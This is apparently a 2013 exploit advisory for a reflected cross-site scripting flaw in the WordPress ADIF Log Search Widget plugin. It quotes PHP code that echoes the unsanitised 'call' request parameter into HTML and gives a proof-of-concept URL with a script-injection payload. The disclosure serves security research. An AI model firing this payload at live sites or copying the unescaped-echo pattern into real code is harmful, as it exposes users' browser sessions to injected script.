# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability # Date: 26/05/13 # Exploit Author: k3170makan # Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/ # Software Link: http://wordpress.org/plugins/adif-log-search-widget/ # Version: 1.0e # Tested on: Ubuntu 12.04.2 LTS Wordpress ADIF log book search plugin widget suffers from a Cross Site Scripting vulnerability. Code: logbook_search.php ------------------------------------------------------------------------------------------------------------------- 55 echo " 56 <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"$num_rows QSO's with ".$_REQUEST['call']."\">"; 57 echo "<table>"; 58 echo " <tr>"; Code: logbook_search.php ------------------------------------------------------------------------------------------------------------------- 93 else{ 94 echo " 95 96 <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"No QSO's with ".$_REQUEST['call']."\"> 97 Sorry, nothing found in the logbook! 98 </div> 99 "; 100 logbook_search_form(); 101 } 102 } The above code fails to sanitize the "$_REQUEST['call']" value passed to the script from the Widgets HTML form, allowing attackers to inject HTML/JavaScript into a victims browser session. PoC: http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://127.0.0.1/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E> -- <k3170makan blog="http://blog.k3170makan.com" src ="https://github.com/k3170makan" tweets="https://twitter.com/k3170makan" />